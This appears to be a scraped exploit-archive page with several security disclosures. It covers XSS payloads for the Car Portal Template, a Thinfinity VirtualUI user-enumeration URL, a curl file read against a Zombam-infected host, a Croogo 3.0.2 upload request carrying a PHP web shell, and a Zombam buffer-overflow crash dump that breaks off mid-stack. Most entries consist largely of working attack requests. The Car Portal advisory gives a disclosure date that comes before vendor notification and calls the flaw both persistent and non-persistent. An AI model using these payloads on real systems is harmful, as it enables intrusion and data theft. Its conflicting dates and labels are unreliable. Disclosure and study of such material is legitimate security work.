<pre><code>Document Title:<br />===============<br />Car Portal Template - (Search) Persistent Web Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2299<br /><br /><br />Release Date:<br />=============<br />2022-02-08<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2299<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.6<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Advanced web solution for creating multi-user car classifieds and auto portal websites. The software has many different features<br />for both the administrators to manage the sites and for the users like functionality for the car dealers to create and manage<br />their own micro site, email alerts in order to notify the users when new cars meeting their search criteria are listed, save the<br />car listings, recommend them to friends, share the listings on the social networks, multi-language support and many others.<br /><br />(Copy of the Homepage:https://www.netartmedia.net/pricing#car-portal )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a non persistent post inject vulnerability in the Car Portal Template PHP Script.<br /><br /><br />Affected Product(s):<br />====================<br />NetArt Media<br />Product: Car Portal Template PHP Script (v2021) - CMS (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-09-01: Researcher Notification & Coordination (Security Researcher)<br />2021-09-02: Vendor Notification (Security Department)<br />2021-**-**: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2021-02-08: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Pre Auth (No Privileges or Session)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A non-persistent post inject web vulnerability has been discovered in the official Car Portal Template PHP Script.<br />The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user<br />session data or to manipulate application contents for clients.<br /><br />The cross site scripting web vulnerability is located in the `username`, `user_first_name`, `user_last_name`, `variant`,<br />`power`, and `milage` parameters of the `index search` module. Remote attackers without privileged access are able to<br />inject own malicious script code in the search input field of the index module post method request. The execution takes<br />place in the results page of the search after submit via post.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent<br />external redirects to malicious source and non-persistent manipulation of affected application modules.<br /><br />Request method(s):<br />[+] POST<br /><br />Vulnerable File(s):<br />[+] index.php<br /><br />Vulnerable Input(s):<br />[+] Trim<br />[+] Power<br />[+] Milage<br />[+] First name<br />[+] Last name<br />[+] Username<br /><br />Vulnerable Parameter(s):<br />[+] username<br />[+] user_first_name<br />[+] user_last_name<br />[+] variant<br />[+] power<br />[+] milage<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction.<br />For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />--- PoC Session Logs (POST) ---<br />https://car-portal-template.localhost:8080/cars2/index.php<br />Host: car-portal-template.localhost:8080<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 878<br />Origin:https://car-portal-template.localhost:8080<br />Connection: keep-alive<br />Referer:https://car-portal-template.localhost:8080/cars2/index.php<br />Cookie: language=en; PHPSESSID=23d238178bfb19f9bd93f25f1b465822<br />ad_type=&selected_package=0&property_type=1,1&property_zip=&price=,&mod=sell&lang=en&Step=2&current_type=1<br />&type=1&username="><img src="evil.source" onload=alert(document.domain)>&password="><img src="evil.source" onload=alert(document.domain)><br />&user_first_name="><img src="evil.source" onload=alert(document.domain)>&user_last_name="><img src="evil.source" onload=alert(document.domain)><br />&user_email=test@aol.de&user_phone=&car_make=Aixam&car_model=505&variant="><img src="evil.source" onload=alert(document.domain)><br />&year=2004&location1=18&location2=-1&level_location=&post_location=18<br />&power="><img src="evil.source" onload=alert(document.domain)>&mileage="><img src="evil.source" onload=alert(document.domain)><br />&transmission=M_MANUAL&fuel_type=M_PETROL&exterior_color=M_WHITE&description=<br />-<br />POST: HTTP/2.0 200 OK<br />server: Apache<br />set-cookie: language=en; expires=Tue; Max-Age=31536000<br />vary: Accept-Encoding<br />content-encoding: gzip<br />content-length: 6974<br />content-type: text/html; charset=UTF-8<br /><br />Note: Searched queries can also be saved to be replied by the client-side within the session to followup exploitation.<br /><br /><br />Reference(s):<br />https://car-portal-template.localhost:8080/<br />https://car-portal-template.localhost:8080/cars2/<br />https://car-portal-template.localhost:8080/cars2/index.php<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code># Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration<br /># Date: 13/12/2021<br /># Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed<br /># Vendor Homepage: https://www.cybelesoft.com<br /># Software Link: https://www.cybelesoft.com/thinfinity/virtualui/<br /># Version: vulnerable < v3.0<br /># Tested on: Microsoft Windows<br /># CVE: CVE-2021-44848<br /><br />How it works: By accessing the vector, an attacker can determine if a username exists thanks to the message returned; it can be presented in different languages according to the configuration of VirtualUI. Common users are administrator, admin, guest...<br />Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME" where "USERNAME" need to be brute-forced.<br />Reference: https://github.com/cybelesoft/virtualui/issues/1<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/1e3665a67201209609ae493a2a590bee_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Zombam.b<br />Vulnerability: Unauthenticated Information Disclosure<br />Description: z0mbie's HTTP RAT v0.1a listens on TCP port 80 to display an HTML Web UI for basic remote administration capability. Third-party attackers who can reach the backdoor can read dir/files on the system.<br />Type: PE32<br />MD5: 1e3665a67201209609ae493a2a590bee<br />Vuln ID: MVID-2022-0488<br />Disclosure: 02/16/2022<br /><br />Exploit/PoC:<br />curl http://MALWARE_INFECTED_HOST/C:/Windows/system.ini<br />; for 16-bit app support<br />[386Enh]<br />woafont=dosapp.fon<br />EGA80WOA.FON=EGA80WOA.FON<br />EGA40WOA.FON=EGA40WOA.FON<br />CGA80WOA.FON=CGA80WOA.FON<br />CGA40WOA.FON=CGA40WOA.FON<br /><br />[drivers]<br />wave=mmdrv.dll<br />timer=timer.drv<br /><br />[mci]<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Croogo 3.0.2 - Unrestricted File Upload<br /># Date: 06/12/2021<br /># Exploit Author: Enes Özeser<br /># Vendor Homepage: https://croogo.org/<br /># Software Link: https://downloads.croogo.org/v3.0.2.zip<br /># Version: 3.0.2<br /># Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3<br /><br />==> 'setting-43' Unrestricted File Upload <==<br /><br />1- Login with your privileged account.<br />2- Click on the 'Settings' section.<br />3- Go to the 'Themes'. Directory is '/admin/settings/settings/prefix/Theme'<br />4- Choose a malicious php script and upload it.<br />5- Go to the '/uploads/(NAME).php' directory. You must change 'NAME' parameter with your filename you uploaded.<br />6- The malicious PHP script will be executed.<br /><br />POST /admin/settings/settings/prefix/Theme HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------360738881613175158033315978127<br />Content-Length: 970<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/settings/settings/prefix/Theme<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="_method"<br /><br />POST<br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="_csrfToken"<br /><br />c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a<br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="setting-43"; filename="malicious.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br />$command = shell_exec('netstat -an');<br />echo "<pre>$command</pre>";<br />?><br /><br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="_Token[fields]"<br /><br />c4e0a45b25b5eaf8fa6e0e4ddcd3be00c621b803%3A<br />-----------------------------360738881613175158033315978127<br />Content-Disposition: form-data; name="_Token[unlocked]"<br /><br /><br />-----------------------------360738881613175158033315978127--<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/1e3665a67201209609ae493a2a590bee.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Zombam.b<br />Vulnerability: Remote Stack Buffer Overflow<br />Description: z0mbie's HTTP RAT v0.1a listens on TCP port 80 to display an HTML Web UI for basic remote administration capability. Third-party attackers who can reach an infected system can trigger a buffer overflow overwriting the EBP and EIP registers by sending a specially crafted HTTP request.<br />Type: PE32<br />MD5: 1e3665a67201209609ae493a2a590bee<br />Vuln ID: MVID-2022-0487<br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 02/16/2022 <br /><br />Memory Dump:<br />(148c.dd4): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=9d082a1a edx=00000000 esi=00000003 edi=00000003<br />eip=7770ed3c esp=0538f194 ebp=0538f324 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:006> .ecxr<br />eax=00000000 ebx=040202b0 ecx=9d082a1a edx=00000000 esi=0538fb51 edi=04020330<br />eip=41414141 esp=0538fab4 ebp=41414141 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />41414141 ?? ???<br /><br />0:006> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />FAULTING_IP: <br />+3485<br />41414141 ?? ???<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 41414141<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 41414141<br />Attempt to read from address 41414141<br /><br />PROCESS_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />READ_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br />00403485 50 push eax<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+3485<br />41414141 ?? ???<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00000dd4<br /><br />BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />IP_ON_HEAP: 41414141<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />FRAME_ONE_INVALID: 1<br /><br />LAST_CONTROL_TRANSFER: from 41414141 to 41414141<br /><br />STACK_TEXT: <br />WARNING: Frame IP not in any known module. Following frames may be wrong.<br />0538fab0 41414141 41414141 41414141 41414141 0x41414141<br />0538fab4 41414141 41414141 41414141 41414141 0x41414141<br />0538fab8 41414141 41414141 41414141 41414141 0x41414141<br />0538fabc 41414141 41414141 41414141 41414141 0x41414141<br />0538fac0 41414141 41414141 41414141 41414141 0x41414141<br />0538fac4 41414141 41414141 41414141 41414141 0x41414141<br />0538fac8 41414141 41414141 41414141 41414141 0x41414141<br />0538facc 41414141 41414141 41414141 41414141 0x41414141<br />0538fad0 41414141 41414141 41414141 41414141 0x41414141<br />0538fad4 41414141 41414141 41414141 41414141 0x41414141<br />0538fad8 41414141 41414141 41414141 41414141 0x41414141<br />0538fadc 41414141 41414141 41414141 41414141 0x41414141<br />0538fae0 41414141 41414141 41414141 41414141 0x41414141<br />0538fae4 41414141 41414141 41414141 41414141 0x41414141<br />0538fae8 41414141 41414141 41414141 41414141 0x41414141<br />0538faec 41414141 41414141 41414141 41414141 0x41414141<br />0538faf0 41414141 41414141 41414141 41414141 0x41414141<br />0538faf4 41414141 41414141 41414141 41414141 0x41414141<br />0538faf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fafc 41414141 41414141 41414141 41414141 0x41414141<br />0538fb00 41414141 41414141 41414141 41414141 0x41414141<br />0538fb04 41414141 41414141 41414141 41414141 0x41414141<br />0538fb08 41414141 41414141 41414141 41414141 0x41414141<br />0538fb0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb10 41414141 41414141 41414141 41414141 0x41414141<br />0538fb14 41414141 41414141 41414141 41414141 0x41414141<br />0538fb18 41414141 41414141 41414141 41414141 0x41414141<br />0538fb1c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb20 41414141 41414141 41414141 41414141 0x41414141<br />0538fb24 41414141 41414141 41414141 41414141 0x41414141<br />0538fb28 41414141 41414141 41414141 41414141 0x41414141<br />0538fb2c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb30 41414141 41414141 41414141 41414141 0x41414141<br />0538fb34 41414141 41414141 41414141 41414141 0x41414141<br />0538fb38 41414141 41414141 41414141 41414141 0x41414141<br />0538fb3c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb40 41414141 41414141 41414141 41414141 0x41414141<br />0538fb44 41414141 41414141 41414141 41414141 0x41414141<br />0538fb48 41414141 41414141 41414141 41414141 0x41414141<br />0538fb4c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb50 41414141 41414141 41414141 41414141 0x41414141<br />0538fb54 41414141 41414141 41414141 41414141 0x41414141<br />0538fb58 41414141 41414141 41414141 41414141 0x41414141<br />0538fb5c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb60 41414141 41414141 41414141 41414141 0x41414141<br />0538fb64 41414141 41414141 41414141 41414141 0x41414141<br />0538fb68 41414141 41414141 41414141 41414141 0x41414141<br />0538fb6c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb70 41414141 41414141 41414141 41414141 0x41414141<br />0538fb74 41414141 41414141 41414141 41414141 0x41414141<br />0538fb78 41414141 41414141 41414141 41414141 0x41414141<br />0538fb7c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb80 41414141 41414141 41414141 41414141 0x41414141<br />0538fb84 41414141 41414141 41414141 41414141 0x41414141<br />0538fb88 41414141 41414141 41414141 41414141 0x41414141<br />0538fb8c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb90 41414141 41414141 41414141 41414141 0x41414141<br />0538fb94 41414141 41414141 41414141 41414141 0x41414141<br />0538fb98 41414141 41414141 41414141 41414141 0x41414141<br />0538fb9c 41414141 41414141 41414141 41414141 0x41414141<br />0538fba0 41414141 41414141 41414141 41414141 0x41414141<br />0538fba4 41414141 41414141 41414141 41414141 0x41414141<br />0538fba8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbac 41414141 41414141 41414141 41414141 0x41414141<br />0538fbb0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbb4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbb8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbbc 41414141 41414141 41414141 41414141 0x41414141<br />0538fbc0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbc4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbc8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbcc 41414141 41414141 41414141 41414141 0x41414141<br />0538fbd0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbd4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbd8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbdc 41414141 41414141 41414141 41414141 0x41414141<br />0538fbe0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbe4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbe8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbec 41414141 41414141 41414141 41414141 0x41414141<br />0538fbf0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbf4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbfc 41414141 41414141 41414141 41414141 0x41414141<br />0538fc00 41414141 41414141 41414141 41414141 0x41414141<br />0538fc04 41414141 41414141 41414141 41414141 0x41414141<br />0538fc08 41414141 41414141 41414141 41414141 0x41414141<br />0538fc0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc10 41414141 41414141 41414141 41414141 0x41414141<br />0538fc14 41414141 41414141 41414141 41414141 0x41414141<br />0538fc18 41414141 41414141 41414141 41414141 0x41414141<br />0538fc1c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc20 41414141 41414141 41414141 41414141 0x41414141<br />0538fc24 41414141 41414141 41414141 41414141 0x41414141<br />0538fc28 41414141 41414141 41414141 41414141 0x41414141<br />0538fc2c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc30 41414141 41414141 41414141 41414141 0x41414141<br />0538fc34 41414141 41414141 41414141 41414141 0x41414141<br />0538fc38 41414141 41414141 41414141 41414141 0x41414141<br />0538fc3c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc40 41414141 41414141 41414141 41414141 0x41414141<br />0538fc44 41414141 41414141 41414141 41414141 0x41414141<br />0538fc48 41414141 41414141 41414141 41414141 0x41414141<br />0538fc4c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc50 41414141 41414141 41414141 41414141 0x41414141<br />0538fc54 41414141 41414141 41414141 41414141 0x41414141<br />0538fc58 41414141 41414141 41414141 41414141 0x41414141<br />0538fc5c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc60 41414141 41414141 41414141 41414141 0x41414141<br />0538fc64 41414141 41414141 41414141 41414141 0x41414141<br />0538fc68 41414141 41414141 41414141 41414141 0x41414141<br />0538fc6c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc70 41414141 41414141 41414141 41414141 0x41414141<br />0538fc74 41414141 41414141 41414141 41414141 0x41414141<br />0538fc78 41414141 41414141 41414141 41414141 0x41414141<br />0538fc7c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc80 41414141 41414141 41414141 41414141 0x41414141<br />0538fc84 41414141 41414141 41414141 41414141 0x41414141<br />0538fc88 41414141 41414141 41414141 41414141 0x41414141<br />0538fc8c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc90 41414141 41414141 41414141 41414141 0x41414141<br />0538fc94 41414141 41414141 41414141 41414141 0x41414141<br />0538fc98 41414141 41414141 41414141 41414141 0x41414141<br />0538fc9c 41414141 41414141 41414141 41414141 0x41414141<br />0538fca0 41414141 41414141 41414141 41414141 0x41414141<br />0538fca4 41414141 41414141 41414141 41414141 0x41414141<br />0538fca8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcac 41414141 41414141 41414141 41414141 0x41414141<br />0538fcb0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcb4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcb8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcbc 41414141 41414141 41414141 41414141 0x41414141<br />0538fcc0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcc4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcc8 41414141 41414141 41414141 41414141 0x41414141<br />0538fccc 41414141 41414141 41414141 41414141 0x41414141<br />0538fcd0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcd4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcd8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcdc 41414141 41414141 41414141 41414141 0x41414141<br />0538fce0 41414141 41414141 41414141 41414141 0x41414141<br />0538fce4 41414141 41414141 41414141 41414141 0x41414141<br />0538fce8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcec 41414141 41414141 41414141 41414141 0x41414141<br />0538fcf0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcf4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcfc 41414141 41414141 41414141 41414141 0x41414141<br />0538fd00 41414141 41414141 41414141 41414141 0x41414141<br />0538fd04 41414141 41414141 41414141 41414141 0x41414141<br />0538fd08 41414141 41414141 41414141 41414141 0x41414141<br />0538fd0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd10 41414141 41414141 41414141 41414141 0x41414141<br />0538fd14 41414141 41414141 41414141 41414141 0x41414141<br />0538fd18 41414141 41414141 41414141 41414141 0x41414141<br />0538fd1c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd20 41414141 41414141 41414141 41414141 0x41414141<br />0538fd24 41414141 41414141 41414141 41414141 0x41414141<br />0538fd28 41414141 41414141 41414141 41414141 0x41414141<br />0538fd2c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd30 41414141 41414141 41414141 41414141 0x41414141<br />0538fd34 41414141 41414141 41414141 41414141 0x41414141<br />0538fd38 41414141 41414141 41414141 41414141 0x41414141<br />0538fd3c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd40 41414141 41414141 41414141 41414141 0x41414141<br />0538fd44 41414141 41414141 41414141 41414141 0x41414141<br />0538fd48 41414141 41414141 41414141 41414141 0x41414141<br />0538fd4c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd50 41414141 41414141 41414141 41414141 0x41414141<br />0538fd54 41414141 41414141 41414141 41414141 0x41414141<br />0538fd58 41414141 41414141 41414141 41414141 0x41414141<br />0538fd5c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd60 41414141 41414141 41414141 41414141 0x41414141<br />0538fd64 41414141 41414141 41414141 41414141 0x41414141<br />0538fd68 41414141 41414141 41414141 41414141 0x41414141<br />0538fd6c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd70 41414141 41414141 41414141 41414141 0x41414141<br />0538fd74 41414141 41414141 41414141 41414141 0x41414141<br />0538fd78 41414141 41414141 41414141 41414141 0x41414141<br />0538fd7c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd80 41414141 41414141 41414141 41414141 0x41414141<br />0538fd84 41414141 41414141 41414141 41414141 0x41414141<br />0538fd88 41414141 41414141 41414141 41414141 0x41414141<br />0538fd8c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd90 41414141 41414141 41414141 41414141 0x41414141<br />0538fd94 41414141 41414141 41414141 41414141 0x41414141<br />0538fd98 41414141 41414141 41414141 41414141 0x41414141<br />0538fd9c 41414141 41414141 41414141 41414141 0x41414141<br />0538fda0 41414141 41414141 41414141 41414141 0x41414141<br />0538fda4 41414141 41414141 41414141 41414141 0x41414141<br />0538fda8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdac 41414141 41414141 41414141 41414141 0x41414141<br />0538fdb0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdb4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdb8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdbc 41414141 41414141 41414141 41414141 0x41414141<br />0538fdc0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdc4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdc8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdcc 41414141 41414141 41414141 41414141 0x41414141<br />0538fdd0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdd4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdd8 41414141 41414141 41414141 41414141 0x41414141<br />0538fddc 41414141 41414141 41414141 41414141 0x41414141<br />0538fde0 41414141 41414141 41414141 41414141 0x41414141<br />0538fde4 41414141 41414141 41414141 41414141 0x41414141<br />0538fde8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdec 41414141 41414141 41414141 41414141 0x41414141<br />0538fdf0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdf4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdfc 41414141 41414141 41414141 41414141 0x41414141<br />0538fe00 41414141 41414141 41414141 41414141 0x41414141<br />0538fe04 41414141 41414141 41414141 41414141 0x41414141<br />0538fe08 41414141 41414141 41414141 41414141 0x41414141<br />0538fe0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fe10 41414141 41414141 41414141 41414141 0x41414141<br />0538fe14 41414141 41414141 41414141 41414141 0x41414<br /><br />STACK_COMMAND: ~6s; .ecxr ; kb<br /><br />SYMBOL_STACK_INDEX: e9<br /><br />SYMBOL_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee<br /><br />IMAGE_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 3e780ebf<br /><br />FAILURE_BUCKET_ID: 